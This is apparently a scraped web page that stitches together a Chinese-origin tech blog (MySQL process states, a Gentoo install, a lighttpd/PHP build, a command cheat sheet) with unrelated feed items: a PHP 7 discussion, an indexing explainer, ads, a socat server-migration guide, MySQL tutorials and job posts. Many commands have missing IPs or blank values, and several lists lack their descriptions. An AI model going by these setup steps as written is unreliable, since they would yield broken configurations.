  A quick rundown of the columns and what they are for. The first column, id, is an identifier; it is what you need when you want to kill a statement. The user column shows the current user; unless you are root, the command only shows SQL statements within your own privileges. The host column shows which IP and port the statement was issued from, which is handy for tracking down the user behind a problem query. The db column shows which database the connection is currently using. The command column shows what the connection is doing, typically Sleep, Query, or Connect. The time column is how long the current state has lasted, in seconds. The state column, an important one, shows the state of the SQL statement on this connection; descriptions of the states follow below. Note that state is only one stage in the execution of a statement: a query, for example, may need to pass through states such as Copying to tmp table, Sorting result and Sending data before it completes. The info column shows the SQL statement itself; it is truncated if the statement is long, but it is an important clue when diagnosing problem queries.

Checking table

Closing tables

Connect Out

Copying to tmp table on disk

Creating tmp table

deleting from main table

deleting from reference tables

Flushing tables

  FLUSH TABLES is being executed; waiting for other threads to close their tables.


Sending data

Sorting for group

  Sorting the result for GROUP BY.
Sorting for order

  Sorting the result for ORDER BY.
Opening tables

  Trying to open a table. This should be very fast unless something interferes; for example, a table cannot be opened by another thread until an ALTER TABLE or LOCK TABLE statement has finished.
Removing duplicates

  Executing a SELECT DISTINCT query where MySQL could not optimize away the duplicates in an earlier stage, so it has to remove the duplicate records again before sending the result to the client.
Reopen table

Repair by sorting

Repair with keycache

  The repair operation is creating new indexes one by one through the key cache. This is slower than Repair by sorting.
Searching rows for update


System lock

Upgrading lock

  INSERT DELAYED is trying to obtain a table lock to insert new records.

User Lock

Waiting for tables


waiting for handler insert

  INSERT DELAYED has processed all pending inserts and is waiting for new requests. Most states correspond to very quick operations; if a thread stays in the same state for several seconds, something may be wrong and is worth checking.


Posted by Alpha on 2012-01-19 14:20


A while ago I installed Gentoo Linux on VMware, using the then-current release. I noted down the installation steps at the time but never got them onto the blog; here they are, written up for sharing and future reference. I have not been using Gentoo for long, so I am still getting to know this distribution.



Host environment: Win2008 + VMware 7.1


Download the install CD and the stage3 tarball:


I used the x86 platform:


wget -c http://distfiles.gentoo.org/releases/x86/autobuilds/current-iso/install-x86-minimal-20100216.iso

wget -c http://distfiles.gentoo.org/releases/x86/autobuilds/current-iso/stage3-i686-20100216.tar.bz2

wget -c http://distfiles.gentoo.org/snapshots/portage-20100617.tar.bz2



Insert the install CD into the virtual machine and boot into the default terminal.

Configure networking first; everything afterwards can be done over an ssh connection.

ifconfig eth0    (in my case VMware had already assigned an internal IP automatically)
echo nameserver > /etc/resolv.conf
echo nameserver > /etc/resolv.conf

Set the root user's password:

passwd root

Start the sshd service:

/etc/init.d/sshd start




cfdisk /dev/sda



mkfs.ext3 /dev/sda1
mkfs.ext3 /dev/sda2
mkswap /dev/sda3


swapon /dev/sda3


nano -w /etc/fstab


/dev/sda1 /boot ext3 noauto,noatime 1 2
/dev/sda2 / ext3 noatime 0 1
/dev/sda3 none swap sw 0 0

Unpack stage3 and portage


mount /dev/sda2 /mnt/gentoo
mkdir /mnt/gentoo/boot
mount /dev/sda1 /mnt/gentoo/boot
cd /mnt/gentoo

Upload the stage3 tarball to /mnt/gentoo with WinSCP or CuteFTP, then unpack it:


tar jxvf stage3-i686-20100608.tar.bz2
rm -f stage3-i686-20100608.tar.bz2

Upload the portage tarball to /mnt/gentoo/usr, then unpack it:

tar jxvf portage-20100617.tar.bz2
rm -f portage-20100617.tar.bz2


cd /
mount -t proc proc /mnt/gentoo/proc
mount -o bind /dev /mnt/gentoo/dev
cp -L /etc/resolv.conf /mnt/gentoo/etc/
chroot /mnt/gentoo /bin/bash
env-update && source /etc/profile


cd /etc
echo " gentoo.at.home gentoo localhost" > hosts
sed -i -e 's/HOSTNAME.*/HOSTNAME="gentoo"/' conf.d/hostname
hostname gentoo




floppy 55736 0
rtc 7960 0
tg3 103228 0
libphy 24952 1 tg3
e1000 114636 0
fuse 59344 0
jfs 153104 0
raid10 20648 0


emerge --sync
emerge gentoo-sources
cd /usr/src/linux
make menuconfig

In the configuration UI type /e1000 to search for e1000 and find where the driver lives:

| Symbol: E1000 [=y]
| Prompt: Intel(R) PRO/1000 Gigabit Ethernet support
| Defined at drivers/net/Kconfig:2020
| Depends on: NETDEVICES && NETDEV_1000 && PCI
| Location:
| -> Device Drivers
| -> Network device support (NETDEVICES [=y])
| -> Ethernet (1000 Mbit) (NETDEV_1000 [=y])


The virtual machine's disk uses the LSI Logic SCSI adapter.

Support for the Fusion MPT base driver therefore needs to be added (see the dmesg log):

Device Drivers —>
— Fusion MPT device support
<*> Fusion MPT ScsiHost drivers for SPI
<*> Fusion MPT ScsiHost drivers for FC
<*> Fusion MPT ScsiHost drivers for SAS
(128) Maximum number of scatter gather entries (16 – 128)
<*> Fusion MPT misc device (ioctl) driver


VFS: Unable to mount root fs via NFS, trying floppy.
VFS: Cannot open root device "sda2" or unknown-block(2,0)
Please append a correct "root=" boot option; here are the available partitions:
0b00 1048575 sr0 driver: sr
Kernel panic – not syncing: VFS: Unable to mount root fs on unknown-block(2,0)

Add support for the ext4 filesystem:

File systems —>
<*> Second extended fs support
[*] Ext4 extended attributes
[*] Ext4 POSIX Access Control Lists
[*] Ext4 Security Labels
[*] Ext4 debugging support


make -j2
make modules_install
cp arch/x86/boot/bzImage /boot/kernel

Install and configure grub

emerge grub

> root (hd0,0)
> setup (hd0)
> quit


nano -w /boot/grub/grub.conf

grub.conf contents are as follows:

default 0
timeout 9

title Gentoo
root (hd0,0)
kernel /boot/kernel root=/dev/sda2



nano -w /etc/fstab
/dev/sda1 /boot ext3 noauto,noatime 1 2
/dev/sda2 / ext3 noatime 0 1
/dev/sda3 none swap sw 0 0


echo 'config_eth0=( "" )' >> /etc/conf.d/net
echo 'routes_eth0=( "default via " )' >> /etc/conf.d/net


rc-update add sshd default


cp /usr/share/zoneinfo/Asia/Shanghai /etc/localtime
nano -w /etc/conf.d/clock

Set the root password:

passwd root


umount /mnt/gentoo/dev /mnt/gentoo/proc /mnt/gentoo/boot /mnt/gentoo



Appendix: make.conf

CFLAGS="-march=native -O2 -pipe -fomit-frame-pointer -mmmx -msse -msse2"
USE="jpeg ssl nls unicode cjk zh nptl nptlonly mmx sse sse2 -X -gtk -gnome \
     sasl maildir imap libwww mysql xml sockets vhosts snmp \
     -lvm -lvm1 -kde -qt -cups -alsa -apache"
GENTOO_MIRRORS="http://mirrors.163.com/gentoo ftp://gg3.net/pub/linux/gentoo"


="i386 x86_64"
="i386 x86_64"

Reference: http://www.gentoo.org/doc/zh_cn/handbook/handbook-amd64.xml


Posted by Alpha on 2011-06-28 16:03


Lighttpd, a new-generation web server, is known for being small (under 1 MB) and fast. This server already runs rails and java with lighttpd as the front-end proxy, and I did not want to deploy apache as well, so I used lighttpd directly and took the chance to see how it performs.

This article covers setting up a PHP environment on CentOS with lighttpd as the web server.

· Installing Lighttpd
Before installing, check that pcre is present; both the pcre and pcre-devel packages are needed. Check with yum search pcre\*: if everything shows as installed you are set, otherwise install the missing packages.

yum install pcre-devel


tar xzvf lighttpd-1.4.23.tar.gz
cd lighttpd-1.4.23
./configure --prefix=/usr/local/lighttpd


make && make install


cp doc/sysconfig.lighttpd /etc/sysconfig/lighttpd
mkdir /etc/lighttpd
cp doc/lighttpd.conf /etc/lighttpd/lighttpd.conf


cp doc/rc.lighttpd.redhat /etc/init.d/lighttpd


cp doc/rc.lighttpd /etc/init.d/lighttpd






/etc/init.d/lighttpd start
/etc/init.d/lighttpd stop
/etc/init.d/lighttpd restart


chkconfig lighttpd on




2) server.document-root, server.error-log and accesslog.filename need to point at appropriate directories

server.username = "nobody"
server.groupname = "nobody"
For security reasons it is not advisable to run the web server as root; specify an ordinary user instead.

compress.cache-dir = "/tmp/lighttpd/cache/compress"
compress.filetype = ("text/plain", "text/html", "text/javascript", "text/css")

5) Configuring ruby on rails


$HTTP["host"] == "www.xxx.com" {
 server.document-root = "/yourrails/public"
 server.error-handler-404 = "/dispatch.fcgi"
 fastcgi.server = (".fcgi" =>
    ("localhost" =>
      ("min-procs" => 10,
       "max-procs" => 10,
       "socket" => "/tmp/lighttpd/socket/rails.socket",
       "bin-path" => "/yourrails/public/dispatch.fcgi",
       "bin-environment" => ("RAILS_ENV" => "production")
      )
    )
  )
}

That is, lighttpd starts 10 FCGI processes and talks to them over a local Unix socket.

$HTTP["host"] =~ "(^|\.)abc\.com" {



$HTTP["host"] =~ "www.domain.cn" {
proxy.server = ( "" => ( "localhost" => ( "host" => "", "port" => 8080 ) ) )
}

All requests for the host www.domain.cn are then handed to tomcat, which listens on port 8080. In tomcat you need a virtual host that catches the www.domain.cn host name; the host entries here correspond to the virtual hosts configured in tomcat.

· Installing PHP with fastcgi support

wget http://curl.cs.pu.edu.tw/download/curl-7.19.5.tar.bz2


tar xvjf curl-7.19.5.tar.bz2
cd curl-7.19.5
./configure --prefix=/usr/local/curl


wget ftp://ftp.ntu.edu.tw/pub/gnu/gnu/gettext/gettext-0.17.tar.gz
tar xvzf gettext-0.17.tar.gz
cd gettext-0.17
./configure --prefix=/usr/local/gettext


wget http://kent.dl.sourceforge.net/sourceforge/libpng/zlib-1.2.3.tar.gz
tar xvzf zlib-1.2.3.tar.gz
cd zlib-1.2.3
./configure --prefix=/usr/local/zlib
make && make install


wget http://www.mirrorservice.org/sites/download.sourceforge.net/pub/sourceforge/l/li/libpng/libpng-1.2.9.tar.gz
tar xvzf libpng-1.2.9.tar.gz
cd libpng-1.2.9
./configure --prefix=/usr/local/libpng
make && make install


wget http://www.ijg.org/files/jpegsrc.v6b.tar.gz
tar xvzf jpegsrc.v6b.tar.gz
cd jpeg-6b/
./configure --prefix=/usr/local/jpeg6


mkdir -p /usr/local/jpeg6/bin
mkdir -p /usr/local/jpeg6/man/man1
mkdir -p /usr/local/jpeg6/lib
mkdir -p /usr/local/jpeg6/include
make install-lib
make install


wget http://download.savannah.gnu.org/releases/freetype/freetype-2.3.9.tar.gz
tar xvzf freetype-2.3.9.tar.gz
cd freetype-2.3.9
./configure --prefix=/usr/local/freetype2


wget http://www.libgd.org/releases/gd-2.0.35.tar.gz
tar xvzf gd-2.0.35.tar.gz
cd gd-2.0.35
./configure --prefix=/usr/local/gd2 --with-zlib=/usr/local/zlib/ --with-png=/usr/local/libpng/ --with-jpeg=/usr/local/jpeg6/ --with-freetype=/usr/local/freetype2/
make install


tar xvzf php-5.2.10.tar.gz
cd php-5.2.10
./configure --prefix=/usr/local/php --with-mysql=/usr/local/mysql --with-pdo-mysql=/usr/local/mysql --with-jpeg-dir=/usr/local/jpeg6/ --with-png-dir=/usr/local/libpng/ --with-gd=/usr/local/gd2/ --with-freetype-dir=/usr/local/freetype2/ --with-zlib-dir=/usr/local/zlib --with-curl=/usr/local/curl --with-gettext=/usr/local/gettext --enable-fastcgi --enable-zend-multibyte --with-config-file-path=/etc --enable-discard-path --enable-force-cgi-redirect
cp php.ini-dist /etc/php.ini


You can check which modules are installed with php -m


wget http://bart.eaccelerator.net/source/
tar xjvf eaccelerator-
cd eaccelerator-
export PHP_PREFIX="/usr/local/php"
./configure --enable-eaccelerator=shared --with-php-config=$PHP_PREFIX/bin/php-config

vim /etc/php.ini

cgi.fix_pathinfo = 1




$ php -v
PHP 5.2.10 (cli) (built: Jun 20 2009 23:32:09)
Copyright (c) 1997-2009 The PHP Group
Zend Engine v2.2.0, Copyright (c) 1998-2009 Zend Technologies
    with eAccelerator v0.9.5.3, Copyright (c) 2004-2006 eAccelerator, by eAccelerator

vim /etc/lighttpd/lighttpd.conf

fastcgi.server             = ( ".php" =>
                               ( "localhost" =>
                                 (
                                   "socket" => "/tmp/php-fastcgi.socket",
                                   "bin-path" => "/usr/local/php/bin/php-cgi"
                                 )
                               )
                             )

/etc/init.d/lighttpd restart



Posted by Alpha on 2011-06-22 23:24



Extract: tar jxvf FileName.tar.bz2   Compress: tar jcvf FileName.tar.bz2 DirName

Extract (1): gunzip FileName.gz   Extract (2): gzip -d FileName.gz   Compress: gzip FileName
.tar.gz and .tgz
Extract: tar zxvf FileName.tar.gz   Compress: tar zcvf FileName.tar.gz DirName

Unpack: rpm2cpio FileName.rpm | cpio -div
Unpack: ar p FileName.deb data.tar.gz | tar zxf -


scp root@* /opt/test  — enter the remote machine's password to complete

scp -P 3588 root@* /opt/test  — using a non-standard port number

scp /opt/test/* root@  — enter the remote machine's password to complete

Usage: chmod [-cfvR] [--help] [--version] mode file...

Usage: chown jessie:users file1.txt

Register MySQL as a service: chkconfig --add mysqld

Ports in use: netstat -ant

Mount USB: mount /dev/sdc /mnt/usb

Rpm install: rpm -ivh filename

Network test: curl -I http://www.job5156.com

Change IP address: ifconfig eth0 netmask

Change gateway: route add default gw   View: route -n

Change DNS: nano -w /etc/resolv.conf

Export table structure: mysqldump -u root -p -d --add-drop-table dbName tableName > /opt/name.sql

Import table structure: mysql dbName < name.sql

Repair MySQL tables: mysqlrepair --auto-repair -F -r dbName tableName

Grant a mysql user account privileges: grant all on dbName.* to user@'%' identified by 'pwd'; FLUSH PRIVILEGES;

Add a column: ALTER TABLE table_name ADD field_name field_type;

Drop a column: alter table t2 drop column c;

Rename a column: alter table t1 change a b integer;

Rename a table: alter table t1 rename t2;

Add an index: alter table tablename add index index_name (column1[, column2 ...]);

Drop an index: alter table tablename drop index emp_name;

Posted by Alpha on 2010-04-16 15:17


          On Our Radar: PHP 7 Controversy and Dependency Injection        

Over the past eight months, we've enjoyed bringing you the latest and greatest updates from the world of web development. But we've also noticed that discussions among web professionals on our forums have not been receiving nearly as much exposure as they should.

To change things up a bit, we're going to start bringing you items and information from those discussions that have caught our attention. Sometimes these discussions will be useful and interesting, and sometimes they may be challenging or insightful. Either way, they're likely to bring new information to light that you haven't come across before, and will help provide insight and perspective on the topics you're interested in.

So let's get started!

PHP 7 Controversy

The PHP 7 Revolution article sparked a vast amount of discussion in our forums. The article covered how PHP is skipping 5.7 and moving directly to PHP 7, that the new version will give us return types, and that the removal of PHP4-style constructors is certainly going to be a controversial change. Tony Marston controversially pleaded: please don't break our language.

An excellent response from rrcatto:

"If a business needs to run a piece of code, to me this also implies actively maintaining it. ... If the language changes, code must also change. That is the only dev paradigm that makes sense, because progress is a good thing and we should not hinder it."

Continue reading %On Our Radar: PHP 7 Controversy and Dependency Injection%

          How does database indexing work        

A database index is a data structure that improves the speed of data retrieval operations on a database table at the cost of additional writes and storage space to maintain the index data structure. Indexes are used to quickly locate data without having to search every row in a database table every time a database table is accessed. Indexes can be created using one or more columns of a database table, providing the basis for both rapid random lookups and efficient access of ordered records.

An index is a copy of selected columns of data from a table that can be searched very efficiently that also includes a low-level disk block address or direct link to the complete row of data it was copied from. Some databases extend the power of indexing by letting developers create indexes on functions or expressions. For example, an index could be created on upper(last_name), which would only store the upper case versions of the last_name field in the index. Another option sometimes supported is the use of partial indices, where index entries are created only for those records that satisfy some conditional expression. A further aspect of flexibility is to permit indexing on user-defined functions, as well as expressions formed from an assortment of built-in functions.
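As a toy model of such a function-based index, one can key a lookup structure on the transformed value, so lookups must apply the same transformation. The dict below is purely illustrative and is not how a real database stores an upper(last_name) index.

```python
# Model of a function-based index on upper(last_name): the index stores
# the transformed value mapped to pointers back to the rows.
rows = [(1, "smith"), (2, "Jones"), (3, "SMITH")]

func_index = {}
for ptr, last in rows:
    func_index.setdefault(last.upper(), []).append(ptr)

print(func_index["SMITH"])  # matches both "smith" and "SMITH"
```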

Given that indexing becomes increasingly important as your data set grows, let's look at how indexing works at a database-agnostic level.

Why is it needed?

When data is stored on disk based storage devices, it is stored as blocks of data. These blocks are accessed in their entirety, making them the atomic disk access operation. Disk blocks are structured in much the same way as linked lists; both contain a section for data, a pointer to the location of the next node (or block), and both need not be stored contiguously.

Because a set of records can be physically sorted on only one field, searching on a field that isn't sorted requires a linear search, which needs N/2 block accesses on average, where N is the number of blocks the table spans. If that field is a non-key field (i.e. doesn't contain unique entries) then the entire table space must be searched, at N block accesses.

With a sorted field, by contrast, a binary search can be used, which takes log2 N block accesses. And since the data is sorted, the rest of the table need not be searched for duplicate values of a non-key field once a higher value is found. The performance increase is therefore substantial.

What is indexing?

Indexing is a way of sorting a number of records on multiple fields. Creating an index on a field in a table creates another data structure which holds the field value, and pointer to the record it relates to. This index structure is then sorted, allowing Binary Searches to be performed on it.
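The structure described here can be modeled in a few lines: a sorted list of (field value, record pointer) pairs searched with binary search. This is a conceptual sketch, not how any particular engine lays out its B-tree on disk.

```python
# An "index" as a sorted list of (value, pointer) pairs, searched with
# binary search; the pointer leads back to the full row.
import bisect

rows = {0: ("Mary", "..."), 1: ("Adam", "..."), 2: ("Zoe", "...")}
index = sorted((first, ptr) for ptr, (first, _rest) in rows.items())

def lookup(name):
    i = bisect.bisect_left(index, (name,))
    if i < len(index) and index[i][0] == name:
        return index[i][1]   # pointer back to the full record
    return None

print(lookup("Adam"), lookup("Bob"))  # found vs. not found
```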

The downside to indexing is that indexes require additional space on disk. With the MyISAM engine the indexes for a table are stored together in one file, which can quickly reach the size limits of the underlying file system if many fields within the same table are indexed.

How does it work?

Firstly, let’s outline a sample database table schema;

Field name       Data type      Size on disk
id (Primary key) Unsigned INT   4 bytes
firstName        Char(50)       50 bytes
lastName         Char(50)       50 bytes
emailAddress     Char(100)      100 bytes

Note: char was used in place of varchar to allow for an accurate size on disk value. This sample database contains five million rows, and is unindexed. The performance of several queries will now be analyzed. These are a query using the id (a sorted key field) and one using the firstName (a non-key unsorted field).

Example 1 - sorted vs unsorted fields

Given our sample database of r = 5,000,000 records of a fixed size giving a record length of R = 204 bytes and they are stored in a table using the MyISAM engine which is using the default block size B = 1,024 bytes. The blocking factor of the table would be bfr = (B/R) = 1024/204 = 5 records per disk block. The total number of blocks required to hold the table is N = (r/bfr) = 5000000/5 = 1,000,000 blocks.

A linear search on the id field would require an average of N/2 = 500,000 block accesses to find a value, given that the id field is a key field. But since the id field is also sorted, a binary search can be conducted requiring an average of log2 1000000 = 19.93 = 20 block accesses. Instantly we can see this is a drastic improvement.

Now the firstName field is neither sorted nor a key field, so a binary search is impossible, nor are the values unique, and thus the table will require searching to the end for an exact N = 1,000,000 block accesses. It is this situation that indexing aims to correct.

Given that an index record contains only the indexed field and a pointer to the original record, it stands to reason that it will be smaller than the multi-field record that it points to. So the index itself requires fewer disk blocks than the original table, which therefore requires fewer block accesses to iterate through. The schema for an index on the firstName field is outlined below;

Field name       Data type      Size on disk
firstName        Char(50)       50 bytes
(record pointer) Special        4 bytes

Note: Pointers in MySQL are 2, 3, 4 or 5 bytes in length depending on the size of the table.

Example 2 - indexing

Given our sample database of r = 5,000,000 records with an index record length of R = 54 bytes and using the default block size B = 1,024 bytes. The blocking factor of the index would be bfr = (B/R) = 1024/54 = 18 records per disk block. The total number of blocks required to hold the index is N = (r/bfr) = 5000000/18 = 277,778 blocks.

Now a search using the firstName field can utilise the index to increase performance. This allows for a binary search of the index with an average of log2 277778 = 18.08 = 19 block accesses. To find the address of the actual record, which requires a further block access to read, bringing the total to 19 + 1 = 20 block accesses, a far cry from the 1,000,000 block accesses required to find a firstName match in the non-indexed table.
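The arithmetic in Examples 1 and 2 can be checked with a short script; the block size B, record count r and the two record lengths come from the article, the rest is plain calculation.

```python
# Reproduce the block-access arithmetic from Examples 1 and 2.
import math

B, r = 1024, 5_000_000           # block size in bytes, record count

def blocks(record_len):
    bfr = B // record_len        # blocking factor: records per block
    return math.ceil(r / bfr)    # blocks needed to hold all records

table_blocks = blocks(204)       # 204-byte rows
index_blocks = blocks(54)        # 54-byte index entries

linear = table_blocks            # full scan of a non-key unsorted field
binary = math.ceil(math.log2(index_blocks)) + 1  # index search + row fetch

print(table_blocks, index_blocks, linear, binary)
```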

When should it be used?

Given that creating an index requires additional disk space (277,778 blocks extra from the above example, a ~28% increase), and that too many indexes can cause issues arising from the file systems size limits, careful thought must be used to select the correct fields to index.

Since indexes are only used to speed up searching for a matching field within the records, it stands to reason that indexing fields used only for output is simply a waste of disk space and of processing time on insert and delete operations, and should be avoided. Also, given the nature of a binary search, the cardinality (uniqueness) of the data matters. Indexing a field with a cardinality of 2 would split the data in half, whereas with a cardinality of 1,000 each value would match roughly 5,000 of our 5,000,000 records. At such low cardinality the effectiveness is reduced to that of a linear sort, and the query optimizer will avoid using the index if the cardinality is less than about 30% of the record count, effectively making the index a waste of space.

          Sponsored Post: Apple, Domino Data Lab, Etleap, Aerospike, Clubhouse, Stream, Scalyr, VividCortex, MemSQL, InMemory.Net, Zohocorp        

Who's Hiring? 

  • Apple is looking for a passionate VoIP engineer with a strong technical background to transform our Voice platform to SIP. It will be an amazing journey with highly skilled, fast paced, and exciting team members. Lead and implement the engineering of Voice technologies in Apple’s Contact Center environment. The Contact Center Voice team provides the real time communication platform for customers’ interaction with Apple’s support and retail organizations. You will lead the global Voice, SIP, and network cross-functional engineers to develop world class customer experience. More details are available here.

  • Advertise your job here! 

Fun and Informative Events

  • Advertise your event here!

Cool Products and Services

  • Enterprise-Grade Database Architecture. The speed and enormous scale of today’s real-time, mission critical applications has exposed gaps in legacy database technologies. Read Building Enterprise-Grade Database Architecture for Mission-Critical, Real-Time Applications to learn: Challenges of supporting digital business applications or Systems of Engagement; Shortcomings of conventional databases; The emergence of enterprise-grade NoSQL databases; Use cases in financial services, AdTech, e-Commerce, online gaming & betting, payments & fraud, and telco; How Aerospike’s NoSQL database solution provides predictable performance, high availability and low total cost of ownership (TCO)

  • What engineering and IT leaders need to know about data science. As data science becomes more mature within an organization, you may be pulled into leading, enabling, and collaborating with data science teams. While there are similarities between data science and software engineering, well intentioned engineering leaders may make assumptions about data science that lead to avoidable conflict and unproductive workflows. Read the full guide to data science for Engineering and IT leaders.

  • Etleap provides a SaaS ETL tool that makes it easy to create and operate a Redshift data warehouse at a small fraction of the typical time and cost. It combines the ability to do deep transformations on large data sets with self-service usability, and no coding is required. Sign up for a 30-day free trial.

  • InMemory.Net provides a Dot Net native in memory database for analysing large amounts of data. It runs natively on .Net, and provides a native .Net, COM & ODBC apis for integration. It also has an easy to use language for importing data, and supports standard SQL for querying data. http://InMemory.Net

  • www.site24x7.com : Monitor End User Experience from a global monitoring network. 

  • Working on a software product? Clubhouse is a project management tool that helps software teams plan, build, and deploy their products with ease. Try it free today or learn why thousands of teams use Clubhouse as a Trello alternative or JIRA alternative.

  • Build, scale and personalize your news feeds and activity streams with getstream.io. Try the API now in this 5 minute interactive tutorial. Stream is free up to 3 million feed updates so it's easy to get started. Client libraries are available for Node, Ruby, Python, PHP, Go, Java and .NET. Stream is currently also hiring Devops and Python/Go developers in Amsterdam. More than 400 companies rely on Stream for their production feed infrastructure, this includes apps with 30 million users. With your help we'd like to add a few zeros to that number. Check out the job opening on AngelList.

  • Scalyr is a lightning-fast log management and operational data platform. It's a tool (actually, multiple tools) that your entire team will love. Get visibility into your production issues without juggling multiple tabs and different services -- all of your logs, server metrics and alerts are in your browser and at your fingertips. Loved and used by teams at Codecademy, ReturnPath, Grab, and InsideSales. Learn more today or see why Scalyr is a great alternative to Splunk.

  • VividCortex is a SaaS database monitoring product that provides the best way for organizations to improve their database performance, efficiency, and uptime. Currently supporting MySQL, PostgreSQL, Redis, MongoDB, and Amazon Aurora database types, it's a secure, cloud-hosted platform that eliminates businesses' most critical visibility gap. VividCortex uses patented algorithms to analyze and surface relevant insights, so users can proactively fix future performance problems before they impact customers.

  • MemSQL provides a distributed in-memory database for high value data. It's designed to handle extreme data ingest and store the data for real-time, streaming and historical analysis using SQL. MemSQL also cost effectively supports both application and ad-hoc queries concurrently across all data. Start a free 30 day trial here: http://www.memsql.com/

  • Advertise your product or service here!

If you are interested in a sponsored post for an event, job, or product, please contact us for more information.


The Solution to Your Operational Diagnostics Woes

Scalyr gives you instant visibility of your production systems, helping you turn chaotic logs and system metrics into actionable data at interactive speeds. Don't be limited by the slow and narrow capabilities of traditional log monitoring tools. View and analyze all your logs and system metrics from multiple sources in one place. Get enterprise-grade functionality with sane pricing and insane performance. Learn more today

VividCortex Gives You Database Superpowers 

Database monitoring is hard, but VividCortex makes it easy. Modern apps run complex queries at large scales across distributed, diverse types of databases (e.g. document, relational, key-value). The “data tier” that these become is tremendously difficult to observe and measure as a whole. The result? Nobody knows exactly what’s happening across all those servers.

VividCortex lets you handle this complexity like a superhero. With VividCortex, you're able to inspect all databases and their workloads together from a bird's eye view, spotting problems and zooming down to individual queries and 1-second-resolution metrics in just two mouse clicks. With VividCortex, you gain a superset of system-monitoring tools that use only global metrics (such as status counters), offering deep, multi-dimensional slice-and-dice visibility into queries, I/O, and CPU, plus other key measurements of your system's work. VividCortex is smart, opinionated, and understands databases deeply, too: it knows about queries, EXPLAIN plans, SQL bugs, typical query performance, and more. It empowers you to find and solve problems that you can't even see with other types of monitoring systems, because they don’t measure what matters to the database.

Best of all, VividCortex isn’t just a DBA tool. Unlike traditional monitoring tools, VividCortex eliminates the walls between development and production -- anybody can benefit from VividCortex and be a superhero. With powerful tools like time-over-time comparison, developers gain immediate production visibility into databases with no need for access to the production servers. Our customers vouch for it: Problems are solved faster and they're solved before they ever reach production. As a bonus, DBAs no longer become the bottleneck for things like code reviews and troubleshooting in the database. 

Make your entire team into database superheroes: deploy VividCortex today. It only takes a moment, and you’re guaranteed to immediately learn something you didn’t already know about your databases and their workload. 


          today's leftovers        

          Migrating a live server to another host with no downtime        

I have had a 1U server co-located for some time now at iWeb Technologies' datacenter in Montreal. So far I've had no issues and it did a wonderful job hosting websites & a few other VMs, but because of my concern for its aging hardware I wanted to migrate away before disaster struck.

Modern VPS offerings are a steal in terms of the performance they offer for the price, and Linode's 4096 plan caught my eye at a nice sweet spot. Backed by powerful CPUs and SSD storage, their VPS is blazingly fast; the only downside is that I would lose some RAM and HDD-backed storage compared to my 1U server. The bandwidth provided with the Linode was also a nice bump up from my previous 10Mbps, 500GB/mo traffic limit.

When CentOS 7 was released I took the opportunity to immediately start modernizing my CentOS 5 configuration and testing it on the new release. I wanted to ensure full continuity for client-facing services: other than a nice speed boost, clients should need to take no manual action on their end to reconfigure their devices or domains.

I also wanted to ensure zero downtime. As the DNS A records were being migrated, I didn't want emails coming in to the wrong server (or clients checking a stale inbox until they started seeing the new mailserver IP). I can easily configure Postfix to relay all incoming mail on the CentOS 5 server to the IP of the CentOS 7 one to avoid any loss of emails, but there's still the issue that some end users might connect to the old server and be served their old IMAP inbox for some time.

So first things first, after developing a prototype VM that offered the same service set, I went about buying a small Linode for a month to test the configuration with some of my existing user data from my CentOS 5 server. MySQL was sufficiently easy to migrate over and Dovecot was able to preserve all UUIDs, so my inbox continued to sync seamlessly. Apache complained a bit when importing my virtual host configurations due to the new 2.4 syntax, but nothing a few sed commands couldn't fix. So with full continuity out of the way, I had to develop a strategy to handle zero downtime.

With some foresight and DNS TTL adjustments, we can get near zero downtime assuming all resolvers comply with your TTL. Simply set your TTL to 300 (5 minutes) a day or so before the migration occurs and as your old TTL expires, resolvers will see the new TTL and will not cache the IP for as long. Even with a short TTL, that's still up to 5 minutes of downtime and clients often do bad things... The IP might still be cached (e.g. at the ISP, router, OS, or browser) for longer. Ultimately, I'm the one that ends up looking bad in that scenario even though I have done what I can on the server side and have no ability to fix the broken clients.

To work around this, I discovered an incredibly handy tool, socat, that can make magic happen. socat routes data between sockets, network connections, files, pipes, you name it. Installing it is as easy as: yum install socat

A quick script later and we can forward all connections from the old host to the new host:


# Stop services on this host
for SERVICE in dovecot postfix httpd mysqld;do
  /sbin/service $SERVICE stop
done

# Some cleanup
rm /var/lib/mysql/mysql.sock

# Map the new server's MySQL to localhost:3307
# Assumes $NEWIP holds the new server's IP address and that
# password-less (e.g. pubkey) login is possible
ssh $NEWIP -L 3307:localhost:3306 &
socat unix-listen:/var/lib/mysql/mysql.sock,fork,reuseaddr,unlink-early,unlink-close,user=mysql,group=mysql,mode=777 TCP:localhost:3307 &

# Map ports from each service to the new host
for PORT in 110 995 143 993 25 465 587 80 3306;do
  echo "Starting socat on port $PORT..."
  socat TCP-LISTEN:$PORT,fork TCP:${NEWIP}:${PORT} &
  sleep 1
done

And just like that, every connection made to the old server is immediately forwarded to the new one. This includes the MySQL socket (which is automatically used instead of a TCP connection when a host of 'localhost' is passed to MySQL).

Note how we establish an SSH tunnel mapping a connection to localhost:3306 on the new server to port 3307 on the old one instead of simply forwarding the connection and socket to the new server - this is done so that if you have users who are permitted on 'localhost' only, they can still connect (forwarding the connection would deny access due to a connection from an unauthorized remote host).

Update: a friend has pointed out this video to me. If you thought zero downtime was hard enough, these guys move a live server 7km via public transport without losing power or network!

          MODULE 2: Managing Tables in MySQL        
Continuing from Module 1, we move on to Module 2. Hopefully it is useful ^_^ 1. Inserting Data: how do we insert data into a table? As an exercise, create a new database named ‘akademikdb’: mysql> CREATE database akademikdb; Then switch to that database: mysql> USE akademikdb; Then create a table named ‘mahasiswa’: mysql> CREATE TABLE mahasiswa (nim […]
          MODULE 1: Building a Database with MySQL        
BUILDING A DATABASE. General form of the command:  mysql-> CREATE DATABASE nama_database; This command is used to create a new database. If the database name has already been used, an error message appears. As an exercise, create an akademik database. mysql-> CREATE DATABASE akademik; HOW DO YOU SEE THE DATABASES THAT ALREADY EXIST?     mysql-> show databases; With the command above, all of the […]
          Job Vacancy: Mobile Programmer        
Understands and can use Cordova mobile programming with its plugins; understands the Android SDK with versioning and Gradle libraries; understands HTML5, CSS/CSS3, JavaScript; understands mobile frameworks such as Framework7, Ionic, etc.; understands web programming in native PHP as well as PHP frameworks and the MySQL database ...

          (0-2 Yrs) HealthPlix Hiring For PHP, Jquery, Mysql web Developer @ Bangalore        
HealthPlix Technologies Pvt Ltd [www.healthplix.com] Openings For Freshers & Experienced : PHP, Jquery, Mysql web Developer @ Bangalore Job Description : Role: Software Developer Full stack web application developer Good programming skills with PHP, Jquery and MySQL Willing to work in start up environment Self motivated and willing to learn new technologies Salary:  INR 2,00,000 ...
          Job Vacancy: Backend Developer        
